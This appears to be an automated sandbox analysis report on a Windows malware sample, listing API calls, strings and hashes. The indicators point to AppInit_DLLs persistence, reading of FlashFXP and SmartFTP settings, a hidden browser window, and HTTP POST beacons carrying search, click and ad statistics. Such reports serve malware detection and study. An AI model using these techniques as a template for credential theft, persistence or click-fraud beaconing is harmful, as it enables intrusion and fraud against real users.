                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                  • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                  • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                  • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                    • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                    • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                    • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                  • String ID: Shell_TrayWnd$eventConn
                  • API String ID: 2141107913-3455059086
                  • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                  • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                  • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                  APIs
                  • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                  • GetLocalTime.KERNEL32(?), ref: 00407387
                  • GetLocalTime.KERNEL32(?), ref: 0040738D
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                  • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                  • String ID:
                  • API String ID: 3166187867-0
                  • Opcode ID: 4339e3f0dc457da50394cd639dc8395ed51e96cf63b790a54362bff983af086b
                  • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                  • Opcode Fuzzy Hash: 4339e3f0dc457da50394cd639dc8395ed51e96cf63b790a54362bff983af086b
                  • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID:
                  • String ID: http$+@
                  • API String ID: 0-4127549746
                  • Opcode ID: 789a0b4113426d536a6dbd70ac3fa36f55536d61627c7eef1083e5a0f6da7bd5
                  • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                  • Opcode Fuzzy Hash: 789a0b4113426d536a6dbd70ac3fa36f55536d61627c7eef1083e5a0f6da7bd5
                  • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: EnvironmentExpandFolderOpenPathStrings
                  • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                  • API String ID: 1994525040-4055253781
                  • Opcode ID: 2c9c97cb0e4b331afd6807a12706ed177aa93df05a890f4fa4eae1323a9dc38e
                  • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                  • Opcode Fuzzy Hash: 2c9c97cb0e4b331afd6807a12706ed177aa93df05a890f4fa4eae1323a9dc38e
                  • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004099EB
                  • SysAllocString.OLEAUT32(?), ref: 004099F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: AllocString
                  • String ID: </domain>$</url>$<domain>$<url>$http://
                  • API String ID: 2525500382-924421446
                  • Opcode ID: 0b84c150fe79eef348fa232134a2979da5830d61bcf949a9e3eece6736197f63
                  • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                  • Opcode Fuzzy Hash: 0b84c150fe79eef348fa232134a2979da5830d61bcf949a9e3eece6736197f63
                  • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                  APIs
                  • SysFreeString.OLEAUT32(753CF6A0), ref: 00408F82
                  • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: a1e4566dcb42a438b782de8cbc71f50032a5fd76516fde8aebe09c3aff29a3de
                  • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                  • Opcode Fuzzy Hash: a1e4566dcb42a438b782de8cbc71f50032a5fd76516fde8aebe09c3aff29a3de
                  • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710), ref: 0040ACAE
                  • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                  • Sleep.KERNEL32(00002710), ref: 0040ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Sleep$AttemptConnectInternet
                  • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                  • API String ID: 362191241-2593661552
                  • Opcode ID: 4cb1df8bb0b87fba6aedb2e3e66e79cfad31cdc84dcae41a1e38891fc59b1e3a
                  • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                  • Opcode Fuzzy Hash: 4cb1df8bb0b87fba6aedb2e3e66e79cfad31cdc84dcae41a1e38891fc59b1e3a
                  • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                  APIs
                  • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                  • __FindPESection.LIBCMT ref: 0040D8AC
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: FindHandlersScopeSectionTableValidate
                  • String ID:
                  • API String ID: 876702719-0
                  • Opcode ID: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                  • Opcode Fuzzy Hash: 534d7b056b49e296d3a3fc6e9a3ba6c277fd5c62c59754af54bacd0a8e696194
                  • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004088E4
                  • SysFreeString.OLEAUT32(?), ref: 004088E9
                  • SysFreeString.OLEAUT32(?), ref: 004089D3
                  • SysFreeString.OLEAUT32(?), ref: 004089D8
                  • SysFreeString.OLEAUT32(?), ref: 004089F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: FreeString
                  • String ID: +@
                  • API String ID: 3341692771-3835504741
                  • Opcode ID: 846800c24ea5a5b9ff161930f7f614b8eb87560c1f77c722534116a1327d738e
                  • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                  • Opcode Fuzzy Hash: 846800c24ea5a5b9ff161930f7f614b8eb87560c1f77c722534116a1327d738e
                  • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094E6
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 4d1bc242cb33ba376acabb77e8562130d532cafd4101d87aa7673051eb511c6b
                  • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                  • Opcode Fuzzy Hash: 4d1bc242cb33ba376acabb77e8562130d532cafd4101d87aa7673051eb511c6b
                  • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                  APIs
                  • _memset.LIBCMT ref: 0040A26B
                  • SysAllocString.OLEAUT32(?), ref: 0040A28E
                  • SysAllocString.OLEAUT32(?), ref: 0040A296
                  • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                  • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                    • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                    • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                    • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                  • String ID: J(@
                  • API String ID: 3143865713-2848800318
                  • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                  • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?), ref: 00408628
                  • GetLastError.KERNEL32 ref: 0040864A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll), ref: 00408687
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                  • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                  • API String ID: 4026185228-3265104503
                  • Opcode ID: fbb25ce4fb2133be7a5b5419f21f392892fccd3598b8746d09e161acbdde3d5e
                  • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                  • Opcode Fuzzy Hash: fbb25ce4fb2133be7a5b5419f21f392892fccd3598b8746d09e161acbdde3d5e
                  • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409B00
                  • SysAllocString.OLEAUT32(?), ref: 00409B0E
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: AllocString
                  • String ID: </title>$</url>$<title>$<url>
                  • API String ID: 2525500382-2286408829
                  • Opcode ID: 80cffecdc154f3961d55a3c5b79764381f6831437f998c4d45a612bfa985b786
                  • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                  • Opcode Fuzzy Hash: 80cffecdc154f3961d55a3c5b79764381f6831437f998c4d45a612bfa985b786
                  • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710,?,?,00000000,?,004027BD,?,00000001,00000000,?,?), ref: 0040A91C
                  • Sleep.KERNEL32(00002710), ref: 0040AAC1
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AAE9
                  • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                  Strings
                  • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                  • 0, xrefs: 0040AA5B
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                  • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                  • API String ID: 3713053250-1268808612
                  • Opcode ID: 6c152bde10d2c0b7e91d23641586db00b07026a1695735e24a6cde11216123b9
                  • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                  • Opcode Fuzzy Hash: 6c152bde10d2c0b7e91d23641586db00b07026a1695735e24a6cde11216123b9
                  • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                  APIs
                  • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                  • GetLocalTime.KERNEL32(?), ref: 004074B3
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 3777474486-0
                  • Opcode ID: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                  • Opcode Fuzzy Hash: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                  • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                  • CloseHandle.KERNEL32(?), ref: 00408452
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 1974014688-0
                  • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                  • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                  • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                  • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                  APIs
                  • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                  • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                  • String ID: POST
                  • API String ID: 961146071-1814004025
                  • Opcode ID: b4e0c7fb39f83403c03b5f090b9d6f141d07a3f8a6ffa7c0d9c020d846c222da
                  • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                  • Opcode Fuzzy Hash: b4e0c7fb39f83403c03b5f090b9d6f141d07a3f8a6ffa7c0d9c020d846c222da
                  • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                  Strings
                  • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                  • folder, xrefs: 00405184
                  • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                  • personal favorites, xrefs: 00405176
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: EnvironmentExpandOpenStrings
